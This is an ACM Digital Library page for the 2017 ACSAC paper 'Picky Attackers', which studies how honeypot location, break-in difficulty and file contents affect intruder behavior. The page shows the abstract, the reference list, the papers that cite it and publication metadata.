skip to main content
10.1145/3134600.3134614acmotherconferencesArticle/Chapter ViewAbstractPublication PagesacsacConference Proceedingsconference-collections
research-article

Picky Attackers: Quantifying the Role of System Properties on Intruder Behavior

Published: 04 December 2017 Publication History

Abstract

Honeypots constitute an invaluable piece of technology that allows researchers and security practitioners to track the evolution of break-in techniques by attackers and discover new malicious IP addresses, hosts, and victims. Even though there has been a wealth of research where researchers deploy honeypots for a period of time and report on their findings, there is little work that attempts to understand how the underlying properties of a compromised system affect the actions of attackers. In this paper, we report on a four-month long study involving 102 medium-interaction honeypots where we vary a honeypot's location, difficulty of break-in, and population of files, observing how these differences elicit different behaviors from attackers. Moreover, we purposefully leak the credentials of dedicated, hard-to-brute-force, honeypots to hacking forums and paste-sites and monitor the actions of the incoming attackers. Among others, we find that, even though bots perform specific environment-agnostic actions, human attackers are affected by the underlying environment, e.g., executing more commands on honeypots with realistic files and folder structures. Based on our findings, we provide guidance for future honeypot deployments and motivate the need for having multiple intrusion-detection systems.

References

[1]
Ahmad Aabed. 2017. Dockpot. (2017). https://github.com/eg-cert/dockpot
[2]
Eric Alata, Vincent Nicomette, Mohamed Kaâniche, Marc Dacier, and Matthieu Herrb. 2006. Lessons learned from the deployment of a high-interaction honeypot. In Dependable Computing Conference, 2006. EDCC'06. Sixth European. IEEE, 39--46.
[3]
Amazon. 2017. AWS IP Address Ranges. (2017). http://docs.aws.amazon.com/general/latest/gr/aws-ip-ranges.html
[4]
Ansible. 2017. Ansible is Simple IT Automation. https://www.ansible.com/. (2017).
[5]
Spiros Antonatos, Iasonas Polakis, Thanasis Petsas, and Evangelos P Markatos. 2010. A systematic characterization of IM threats using honeypots. In ISOC Network and Distributed System Security Symposium (NDSS).
[6]
Marco Balduzzi, Payas Gupta, Lion Gu, Debin Gao, and Mustaque Ahamad. 2016. Mobipot: Understanding mobile telephony threats with honeycards. In Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. ACM, 723--734.
[7]
Brian M Bowen, Shlomo Hershkop, Angelos D Keromytis, and Salvatore J Stolfo. 2009. Baiting inside attackers using decoy documents. In International Conference on Security and Privacy in Communication Systems. Springer, 51--70.
[8]
Ron Bowes. 2017. Leaked Passwords. (2017). https://wiki.skullsecurity.org/index.php?title=Passwords
[9]
Davide Canali and Davide Balzarotti. 2013. Behind the scenes of online attacks: an analysis of exploitation behaviors on the web. In 20th Annual Network & Distributed System Security Symposium (NDSS 2013). n--a.
[10]
Graham Cluley. 2016. These 60 dumb passwords can hijack over 500,000 IoT devices into the Mirai botnet. https://www.grahamcluley.com/mirai-botnet-password/. (2016).
[11]
Marc Dacier, Fabien Pouget, and Hervé Debar. 2004. Honeypots: A Practical means to validate malicious fault assumptions. In Dependable Computing, 2004. Proceedings. 10th IEEE Pacific Rim International Symposium on. IEEE, 383--388.
[12]
Brown Farinholt, Mohammad Rezaeirad, Paul Pearce, Hitesh Dharmdasani, Haikuo Yin, Stevens Le Blond, Damon McCoy, and Kirill Levchenko. 2017. To Catch a Ratter: Monitoring the Behavior of Amateur DarkComet RAT Operators in the Wild. In 38th IEEE Symposium on Security and Privacy (IEEE S&P).
[13]
Vindu Goel and Nicole Perlroth. 2016. Yahoo Says 1 Billion User Accounts Were Hacked. (2016). https://www.nytimes.com/2016/12/14/technology/yahoo-hack.html
[14]
Payas Gupta, Bharath Srinivasan, Vijay Balasubramaniyan, and Mustaque Ahamad. 2015. Phoneypot: Data-driven Understanding of Telephony Threats. In NDSS.
[15]
Are Hansen. 2014. Bifrozt - A high interaction honeypot solution for Linux based systems. (2014). https://www.honeynet.org/node/1191
[16]
Ioannis Koniaris, Georgios Papadimitriou, and Petros Nicopolitidis. 2013. Analysis and visualization of SSH attacks using honeypots. In EUROCON, 2013 IEEE. IEEE, 65--72.
[17]
Brian Krebs. 2013. Cards Stolen in Target Breach Flood Underground Markets. http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets. (2013).
[18]
Steffen Liebergeld, Matthias Lange, and Collin Mulliner. 2013. Nomadic Honeypots: A Novel Concept for Smartphone Honeypots. In Workshop on Mobile Security Technologies (MoST). San Francisco, CA.
[19]
Lily Hay Newman. 2016. The Botnet That Broke the Internet Isn't Going Away. https://www.wired.com/2016/12/botnet-broke-internet-isnt-going-away/. (2016).
[20]
Vincent Nicomette, Mohamed Kaâniche, Eric Alata, and Matthieu Herrb. 2011. Set-up and deployment of a high-interaction honeypot: experiment and lessons learned. Journal in computer virology 7, 2 (2011), 143--157.
[21]
Jeremiah Onaolapo, Enrico Mariconti, and Gianluca Stringhini. 2016. What Happens After You Are Pwnd: Understanding the Use of Leaked Webmail Credentials in the Wild. In ACM SIGCOMM Internet Measurement Conference, Vol. 2016. Association for Computing Machinery (ACM).
[22]
Michel Oosterhof. 2016. Cowrie SSH/Telnet Honeypot. https://github.com/micheloosterhof/cowrie. (2016).
[23]
Youngsam Park, Jackie Jones, Damon McCoy, Elaine Shi, and Markus Jakobsson. 2014. Scambaiter: Understanding targeted Nigerian scams on craigslist. In Proceedings of the Network and Distributed System Security Symposium (NDSS).
[24]
Nicole Perlroth. 2016. Yahoo Says Hackers Stole Data on 500 Million Users in 2014. (2016). https://www.nytimes.com/2016/09/23/technology/yahoo-hackers.html
[25]
The Honeynet Project. 2017. About The Honeynet Project. https://www.honeynet.org/about. (2017).
[26]
The Honeynet Project. 2017. Papers. https://www.honeynet.org/papers. (2017).
[27]
Niels Provos and Thorsten Holz. 2007. Virtual honeypots: from botnet tracking to intrusion detection. Pearson Education.
[28]
Daniel Ramsbrock, Robin Berthier, and Michel Cukier. 2007. Profiling attacker behavior following SSH compromises. In 37th Annual IEEE/IFIP International Conference on Dependable Systems and Networks, 2007. DSN'07. IEEE, 119--124.
[29]
Frederic Raynal, Yann Berthier, Philippe Biondi, and Danielle Kaminsky. 2004. Honeypot forensics. In Information Assurance Workshop.
[30]
Christian Rich. 2016. Natural filename generator. https://github.com/ChristianRich/natural-filename-generator. (2016).
[31]
Malek Ben Salem and Salvatore J Stolfo. 2011. Decoy document deployment for effective masquerade attack detection. In International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment. Springer, 35--54.
[32]
Lance Spitzner. 2003. The honeynet project: Trapping the hackers. IEEE Security & Privacy 99, 2 (2003), 15--23.
[33]
Lance Spitzner. 2003. Honeypots: tracking hackers. Vol. 1. Addison-Wesley Reading.
[34]
Jonathan Voris, Jill Jermyn, Nathaniel Boggs, and Salvatore Stolfo. 2015. Fox in the trap: thwarting masqueraders via automated decoy document deployment. In Proceedings of the Eighth European Workshop on System Security.
[35]
Susan Marie Wade. 2011. SCADA Honeynets: The attractiveness of honeypots as critical infrastructure security tools for the detection and analysis of advanced threats. (2011).

Cited By

View all
  • (2024)Observation of Human-Operated Accesses Using Remote Management Device HoneypotIEICE Transactions on Fundamentals of Electronics, Communications and Computer Sciences10.1587/transfun.2023CIP0018E107.A:3(291-305)Online publication date: 1-Mar-2024
  • (2024)Examining the Cyclical Nature of Crimes: A Looped Crime Script of Data Theft from Organizational NetworksComputers in Human Behavior Reports10.1016/j.chbr.2024.100548(100548)Online publication date: Nov-2024
  • (2023)Stargazer: Long-term and Multiregional Measurement of Timing/Geolocation-based CloakingIEEE Access10.1109/ACCESS.2023.3280815(1-1)Online publication date: 2023
  • Show More Cited By
  1. Picky Attackers: Quantifying the Role of System Properties on Intruder Behavior

    Recommendations

    Comments

    Information & Contributors

    Information

    Published In

    cover image ACM Other conferences
    ACSAC '17: Proceedings of the 33rd Annual Computer Security Applications Conference
    December 2017
    618 pages
    ISBN:9781450353458
    DOI:10.1145/3134600
    Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from [email protected]

    Publisher

    Association for Computing Machinery

    New York, NY, United States

    Publication History

    Published: 04 December 2017

    Permissions

    Request permissions for this article.

    Check for updates

    Qualifiers

    • Research-article
    • Research
    • Refereed limited

    Conference

    ACSAC 2017

    Acceptance Rates

    Overall Acceptance Rate 104 of 497 submissions, 21%

    Contributors

    Other Metrics

    Bibliometrics & Citations

    Bibliometrics

    Article Metrics

    • Downloads (Last 12 months)55
    • Downloads (Last 6 weeks)11
    Reflects downloads up to 03 Jan 2025

    Other Metrics

    Citations

    Cited By

    View all
    • (2024)Observation of Human-Operated Accesses Using Remote Management Device HoneypotIEICE Transactions on Fundamentals of Electronics, Communications and Computer Sciences10.1587/transfun.2023CIP0018E107.A:3(291-305)Online publication date: 1-Mar-2024
    • (2024)Examining the Cyclical Nature of Crimes: A Looped Crime Script of Data Theft from Organizational NetworksComputers in Human Behavior Reports10.1016/j.chbr.2024.100548(100548)Online publication date: Nov-2024
    • (2023)Stargazer: Long-term and Multiregional Measurement of Timing/Geolocation-based CloakingIEEE Access10.1109/ACCESS.2023.3280815(1-1)Online publication date: 2023
    • (2023)Flow based containerized honeypot approach for network traffic analysis: An empirical studyComputer Science Review10.1016/j.cosrev.2023.10060050(100600)Online publication date: Nov-2023
    • (2022)Interaction matters: a comprehensive analysis and a dataset of hybrid IoT/OT honeypotsProceedings of the 38th Annual Computer Security Applications Conference10.1145/3564625.3564645(742-755)Online publication date: 5-Dec-2022
    • (2022)Measuring and Clustering Network Attackers using Medium-Interaction Honeypots2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW)10.1109/EuroSPW55150.2022.00036(294-306)Online publication date: Jun-2022
    • (2022)Analysing Attackers and Intrusions on a High-Interaction Honeypot System2022 27th Asia Pacific Conference on Communications (APCC)10.1109/APCC55198.2022.9943718(433-438)Online publication date: 19-Oct-2022
    • (2022)Autoencoder-based feature construction for IoT attacks clusteringFuture Generation Computer Systems10.1016/j.future.2021.09.025127:C(487-502)Online publication date: 23-Apr-2022
    • (2020)Continuous and Multiregional Monitoring of Malicious HostsProceedings of the 2020 ACM SIGSAC Conference on Computer and Communications Security10.1145/3372297.3420018(2101-2103)Online publication date: 30-Oct-2020
    • (2020)A Measurement Study of IoT-Based Attacks Using IoT Kill Chain2020 IEEE 19th International Conference on Trust, Security and Privacy in Computing and Communications (TrustCom)10.1109/TrustCom50675.2020.00080(557-567)Online publication date: Dec-2020
    • Show More Cited By

    View Options

    Login options

    View options

    PDF

    View or Download as a PDF file.

    PDF

    eReader

    View online with eReader.

    eReader

    Media

    Figures

    Other

    Tables

    Share

    Share

    Share this Publication link

    Share on social media